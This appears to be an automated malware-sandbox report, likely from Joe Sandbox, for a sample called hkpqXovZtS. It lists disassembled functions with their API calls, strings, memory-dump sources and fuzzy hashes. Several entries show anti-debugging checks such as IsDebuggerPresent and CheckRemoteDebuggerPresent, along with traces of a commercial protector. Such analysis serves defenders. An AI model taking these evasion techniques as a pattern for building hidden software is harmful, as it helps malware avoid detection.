__byteswap_ulong.LIBCMT ref: 004103AD
__byteswap_ulong.LIBCMT ref: 004103C0
__byteswap_ulong.LIBCMT ref: 004103D3
__byteswap_ulong.LIBCMT ref: 004103E6
__byteswap_ulong.LIBCMT ref: 004103F9
__byteswap_ulong.LIBCMT ref: 0041040C
__byteswap_ulong.LIBCMT ref: 0041041F
__byteswap_ulong.LIBCMT ref: 00410432
__byteswap_ulong.LIBCMT ref: 00410445
__byteswap_ulong.LIBCMT ref: 00410458
__byteswap_ulong.LIBCMT ref: 0041046B
__byteswap_ulong.LIBCMT ref: 0041047E
__byteswap_ulong.LIBCMT ref: 00410493
__byteswap_ulong.LIBCMT ref: 004104A6
__byteswap_ulong.LIBCMT ref: 004104B9
__byteswap_ulong.LIBCMT ref: 004104CC

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __byteswap_ulong
String ID:
API String ID: 2309504477-0
Opcode ID: 8fadf0a658a046e613e6f6ee0120c6b4fdc4be59de6621fbc47c2dc855fc6684
Instruction ID: ae09c21276feb9784293b5133c474c8fe19c270e3c86d0be91ad24f9f1f1b2bb
Opcode Fuzzy Hash: 8fadf0a658a046e613e6f6ee0120c6b4fdc4be59de6621fbc47c2dc855fc6684
Instruction Fuzzy Hash: 2B91F771A00604CFCB24DF5AC982A9EB7F1FF48308F0445AEE54AE7762D734A9958F58

Function 004D106C Relevance: 12.2, APIs: 8, Instructions: 153nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,00000000), ref: 004D10C0

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: e5fda7db3b634dabafd301b5c07e8c611a8d6a74eab8b1a3a86258f5aefeb9b9
Instruction ID: ef674d6f5e5b2fb620a1060b41ae7ae8028997c213016c9df34677ddefdda6e7
Opcode Fuzzy Hash: e5fda7db3b634dabafd301b5c07e8c611a8d6a74eab8b1a3a86258f5aefeb9b9
Instruction Fuzzy Hash: 1871C9B4D01209EFDF10DF94D968BEEBBB4AB48304F20809AD905B7390C7B95A85DF95

Function 022AD768 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1427COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 022AD924

Strings

1#INF, xrefs: 022AEC1F
1#SNAN, xrefs: 022AEC0B
1#IND, xrefs: 022AEC01
kL, xrefs: 022AD773
1#QNAN, xrefs: 022AEC15

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$kL
API String ID: 4168288129-2108231660
Opcode ID: 60e164d3b6642213a3def2011ef3865377b113cce6ac2322ae7d3e6a38e20ccd
Instruction ID: 545bebec9e01a61cae0c24b270bcce453cca259297d2c2cd509dd8a382b472e7
Opcode Fuzzy Hash: 60e164d3b6642213a3def2011ef3865377b113cce6ac2322ae7d3e6a38e20ccd
Instruction Fuzzy Hash: 23D25A71E242298FDB65CEA8CD507EAB3B5EB44304F1545EAD40EE7A44E778AE81CF40

Function 00402E66 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 543COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402E6F
_memcmp.LIBCMT ref: 00402F3A
_memcmp.LIBCMT ref: 00403217

Strings

lB, xrefs: 00402F5E
@, xrefs: 004033E4
lB, xrefs: 00403045

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memcmp$H_prolog
String ID: @$lB$lB
API String ID: 212800410-1963657377
Opcode ID: 670c3fa6525e6dbcabfcc6a184edee081faf9e168c82c6a5e3294fbc6d14a827
Instruction ID: 72478925cf9371104673018591e4c29575c5634b2171b1aafb1ce66178da3c0a
Opcode Fuzzy Hash: 670c3fa6525e6dbcabfcc6a184edee081faf9e168c82c6a5e3294fbc6d14a827
Instruction Fuzzy Hash: BD22F4715043849ADF14DF25C8857DA3BE4EF15308F08057FEC4AAB2D2DB79AA88CB59

Function 0040CA7B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CAD3,00000020,?,?,00405CBB,?,00000020,00000001,?,00000010,?,?,?,00000001), ref: 0040CA89
GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CAA2
GetProcAddress.KERNEL32(004339B8,CryptUnprotectMemory), ref: 0040CAAE

Strings

CryptUnprotectMemory, xrefs: 0040CAA4
Crypt32.dll, xrefs: 0040CA84
CryptProtectMemory, xrefs: 0040CA9C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2238633743-1753850145
Opcode ID: f300a98f2b62c7f3a1d6754c34f54a5a882d2040f422b21eb1fea9acfed9a943
Instruction ID: 55fd0b1eee952b3016a3883da5b333625fa6a0b6b7c783b45655f994e486e817
Opcode Fuzzy Hash: f300a98f2b62c7f3a1d6754c34f54a5a882d2040f422b21eb1fea9acfed9a943
Instruction Fuzzy Hash: 15E09A30A00310DAC730DB79B844B02FBE89FA4714B12886FE488E3291D6B8D4818B18

Function 0229798C Relevance: 10.5, Strings: 8, Instructions: 522COMMON

Download Yara Rule

Strings

D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c, xrefs: 02297A9A, 02297C34, 02297C80, 02297DA8, 02297E0E, 02297E87, 02297F71, 02297FC5, 02297FF9, 02298028, 0229809A
!ImmediateSize, xrefs: 02297C39
[0x%08I64X] ANOMALY: Unexpected segment override, xrefs: 02297BC3
[0x%08I64X] ANOMALY: unexpected segment 0x%02X, xrefs: 02297D69
!X86Instruction->HasSrcAddressing, xrefs: 02297E8C, 0229809B
!X86Instruction->HasDstAddressing, xrefs: 02297E13, 02298029
OperandIndex < 2, xrefs: 02297A9F
!X86Instruction->HasSelector, xrefs: 02297FFA

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: !ImmediateSize$!X86Instruction->HasDstAddressing$!X86Instruction->HasSelector$!X86Instruction->HasSrcAddressing$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c$OperandIndex < 2$[0x%08I64X] ANOMALY: Unexpected segment override$[0x%08I64X] ANOMALY: unexpected segment 0x%02X
API String ID: 0-3094911072
Opcode ID: 2b667cbd590bda2a0d174f8c8d876445ada4544e9f01f363cbe83e8078462e9c
Instruction ID: 9ff38f791ab0551aa037a07cb369910ba276093d0fa45391b26a0a3623935496
Opcode Fuzzy Hash: 2b667cbd590bda2a0d174f8c8d876445ada4544e9f01f363cbe83e8078462e9c
Instruction Fuzzy Hash: FE121DB14397429BEB26CF78C8167E7FBE1AF42308F08491DF5DA4629AD3749254CB11

Function 0229749C Relevance: 7.8, Strings: 6, Instructions: 296COMMON

Download Yara Rule

Strings

D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c, xrefs: 022974A2, 022974C0, 022974FE, 02297600, 0229765A, 022976D3, 022977E2, 02297878, 02297920
[0x%08I64X] ANOMALY: unexpected segment 0x%02X, xrefs: 022975C1
!X86Instruction->HasSrcAddressing, xrefs: 022976D8, 02297925
!X86Instruction->HasDstAddressing, xrefs: 0229765F, 022977E7
!X86Instruction->rex_b, xrefs: 022974C1
!X86Instruction->HasSelector, xrefs: 0229787D

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: !X86Instruction->HasDstAddressing$!X86Instruction->HasSelector$!X86Instruction->HasSrcAddressing$!X86Instruction->rex_b$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c$[0x%08I64X] ANOMALY: unexpected segment 0x%02X
API String ID: 0-1926436987
Opcode ID: 01d3140f92491e51cf157d26f85e740b56e8f00c11b7e9a103eb448657a96025
Instruction ID: d3618c4359a9ab054d13fcb2e682296832f1e4b419900e09ea0803f8f0cadab7
Opcode Fuzzy Hash: 01d3140f92491e51cf157d26f85e740b56e8f00c11b7e9a103eb448657a96025
Instruction Fuzzy Hash: C8C1FCF1479B818BE7228B7484267E3FFD4BF05318F08895CE5EA4A28BD3B59258C751

Function 00401C56 Relevance: 7.8, APIs: 2, Strings: 2, Instructions: 755COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401C5B
_strlen.LIBCMT ref: 004021C7

Part of subcall function 00411228: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0040A105,00000000,?,?,?,00000800), ref: 00411244

Strings

lB, xrefs: 00402464
lB, xrefs: 00402615

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ByteCharH_prologMultiWide_strlen
String ID: lB$lB
API String ID: 939850776-3074592483
Opcode ID: 51e6539cd6ad76c119b1d84aef5398798daaa018706baafa8eb673dbe9fccf63
Instruction ID: da781dcfa3c41042e7f179c7e93926067d03a5c3b1155e994cd270deb5491572
Opcode Fuzzy Hash: 51e6539cd6ad76c119b1d84aef5398798daaa018706baafa8eb673dbe9fccf63
Instruction Fuzzy Hash: 0D62F131904684CACF15DF64C8897EE7BB0EF55304F08447EE98AAB2D2CB786945CB69

Function 022A6F92 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 022A708A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 022A7094
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 022A70A1

Strings

kL, xrefs: 022A6F9D

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: kL
API String ID: 3906539128-2496334608
Opcode ID: 244ca0cf81f2807dbb8e1fb8c2e9af774aaf715c18808a5d3d5e225fffc2a2a0
Instruction ID: 2e64600c29f675d45688f021c07ed73a0cab39485d97754e0844455cef6ed9cd
Opcode Fuzzy Hash: 244ca0cf81f2807dbb8e1fb8c2e9af774aaf715c18808a5d3d5e225fffc2a2a0
Instruction Fuzzy Hash: F631D475D513199BCB21DF68D98879CBBB8BF08310F5045DAE81CA7250EB709B818F55

Function 0229FC9C Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0229FCA8
IsDebuggerPresent.KERNEL32 ref: 0229FD74
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0229FD94
UnhandledExceptionFilter.KERNEL32(?), ref: 0229FD9E

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f390117d259f5a487fa1d28411c221687109377fa8fa1cb1cbcb6ab188abf453
Instruction ID: e8fb9946f59ceab7dda370cc3a97c2d23e580be56175bfb9b1e2685f9e11b3a3
Opcode Fuzzy Hash: f390117d259f5a487fa1d28411c221687109377fa8fa1cb1cbcb6ab188abf453
Instruction Fuzzy Hash: 4F310275D51318DBDF21DFA4E989BCCBBB8BF08304F1045AAE408AB244EB709A848F54

Function 022A5BE9 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,022A5BE8,022E4FE0,0000003F,?,022E4FE0,?,022A15AA), ref: 022A5C0B
TerminateProcess.KERNEL32(00000000,?,022A5BE8,022E4FE0,0000003F,?,022E4FE0,?,022A15AA), ref: 022A5C12
ExitProcess.KERNEL32 ref: 022A5C24

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0d3f369b0560f7df003464f0caaa9b623bb057df2806786d92be2979b0f7fbfb
Instruction ID: 8931d097c2106e779669784c05f34bd3e2bef068e91f1620f425028c83bce55d
Opcode Fuzzy Hash: 0d3f369b0560f7df003464f0caaa9b623bb057df2806786d92be2979b0f7fbfb
Instruction Fuzzy Hash: 2BE04F31C64104BFCB12AF94E91C94D3B6AFF14341B400814F8088A524CB35E9A5CB80

Function 00413FDA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 489COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 004140B5

Strings

lB, xrefs: 004140C2

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _realloc
String ID: lB
API String ID: 1750794848-323450203
Opcode ID: 1b38b0be6cdb36ee81c8732530f228ad12b858b4070a5ecb8b0d261261b6c79c
Instruction ID: a5bf126ac02e8c0db7642b2bc99c0050375498717efd55f9e93addb7aaa72c34
Opcode Fuzzy Hash: 1b38b0be6cdb36ee81c8732530f228ad12b858b4070a5ecb8b0d261261b6c79c
Instruction Fuzzy Hash: F312A1B1A006069BCB29CF24C5916F9B7E1FF85304F24852ED55BCBA84D738E9D1CB49

Function 022A41AC Relevance: 4.0, Strings: 3, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Strings

kL, xrefs: 022A41B4
D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022A42C6
0, xrefs: 022A433C

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: 0$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c$kL
API String ID: 0-2726477203
Opcode ID: c1524491431fc221099ce72ad76449aabe9dda0db322fa5db00bfeccfc0ce00b
Instruction ID: fa9d549f00ad7b792b8521d0eb534232b4d8ce439371e4c2c6e20c7e8292f8a6
Opcode Fuzzy Hash: c1524491431fc221099ce72ad76449aabe9dda0db322fa5db00bfeccfc0ce00b
Instruction Fuzzy Hash: B561377063030A97DB38FAE89570BBEB3A5AB81708F54052AD842DFE8CD7E1E945C741

Function 022AAFC7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

kL, xrefs: 022AB083

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: kL
API String ID: 0-2496334608
Opcode ID: 098127059bcfa53212e9fa0e415b1a399626880c3bd24948838697630d283ef0
Instruction ID: 9868d51931fbc23f76552a88946820f81f0ca51fbf849abe90cb03d729c3dc3d
Opcode Fuzzy Hash: 098127059bcfa53212e9fa0e415b1a399626880c3bd24948838697630d283ef0
Instruction Fuzzy Hash: 7D41C1B1C14219AFDB24DFA9CC99AAABBB9EF45304F1442D9E41CD3214DA319E84CF10

Function 022AD2D0 Relevance: 3.4, APIs: 2, Instructions: 450COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85da51b138ba792ec13a10f672c2d26e299b350a798bdebbfdd76a98c3e546cf
Instruction ID: ded02d05ce4494ef59c363e7554f4126acf996b27e6c842f12d86a996ebdb5f9
Opcode Fuzzy Hash: 85da51b138ba792ec13a10f672c2d26e299b350a798bdebbfdd76a98c3e546cf
Instruction Fuzzy Hash: 35F14F71E112199FDF18CFA9D8906EDB7B1FF48714F158269D819ABB44D730AA01CF90

Function 004D0F9C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 004D0FAB
CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 004D0FB2

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CheckCurrentDebuggerPresentProcessRemote
String ID:
API String ID: 3244773808-0
Opcode ID: f0da53dde7f9d49de36d188e60cd7c83b30466b84411e445b94999bb36e85478
Instruction ID: 4db9a21c669d5ad2b10ed07c6c3810ba5d080f6429e28e87e2e44eb0b7892e25
Opcode Fuzzy Hash: f0da53dde7f9d49de36d188e60cd7c83b30466b84411e445b94999bb36e85478
Instruction Fuzzy Hash: ABE01270909208EBDB20CBE5D85D79A77AC9B04302F20456FA404C3254DBB9CA54D75E

Function 022A4409 Relevance: 2.7, Strings: 2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Strings

kL, xrefs: 022A4411
0, xrefs: 022A4599

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: 0$kL
API String ID: 0-2777542040
Opcode ID: 74b82b60336ffff069e56ff7eb876d4efeb5c51c26b8cfcb5d66edab4940c6c1
Instruction ID: 9f6646a4c2d81179960f3b720c16416aa4698f4b3b0812d7efd0838775d7301d
Opcode Fuzzy Hash: 74b82b60336ffff069e56ff7eb876d4efeb5c51c26b8cfcb5d66edab4940c6c1
Instruction Fuzzy Hash: 38616870A3074797CB38FAE888B07BEA396AB91B08F44091ED542DBE8CD7E0D945C755

Function 00413664 Relevance: 1.9, APIs: 1, Instructions: 444COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004138AA

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 03f3dc45a7d481ee766d2c504b6e2acbc0f63000ebeb9ed0f4255058e1e786b6
Instruction ID: adab659f13cac0ec583eed1968438829ac5a4d0fc0857ce7e58d59b274625805
Opcode Fuzzy Hash: 03f3dc45a7d481ee766d2c504b6e2acbc0f63000ebeb9ed0f4255058e1e786b6
Instruction Fuzzy Hash: 43F1A1B1D002599FCF14CF68C8916EEBBB4FF44355F14816BE855AB382D3389A81CB98

Function 022B2006 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,022B2001,?,?,00000008,?,?,022B1C99,00000000), ref: 022B2233

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3f5eb18b2d85bba25b829200e4fb4c100906eaac40e15ae8dcd48310dc52556d
Instruction ID: 0eb2c7e4028cdf27241e71ab0edaeb79b9a5692376904bc4914a87dcbc19bf60
Opcode Fuzzy Hash: 3f5eb18b2d85bba25b829200e4fb4c100906eaac40e15ae8dcd48310dc52556d
Instruction Fuzzy Hash: 82B17D31630705CFD71ACF68C486BA57BA0FF453A4F158658E999CF2AAC375E982CB40

Function 00413205 Relevance: 1.8, APIs: 1, Instructions: 267COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00413295

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cf22f7b8d02a5ff97bdc6fd6c11410ef8828bc4388737f7604bc3fe7212f0d81
Instruction ID: 3593f78325c96443ecff7473da8e87a94a75de6c502b7fdd235fbb49b2d7dc69
Opcode Fuzzy Hash: cf22f7b8d02a5ff97bdc6fd6c11410ef8828bc4388737f7604bc3fe7212f0d81
Instruction Fuzzy Hash: C0A1F171600208EBDB05DF99C991BED77B5EB40305F1044BFE946EB282CB389B86DB59

Function 0046E874 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?), ref: 004D0F8F

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

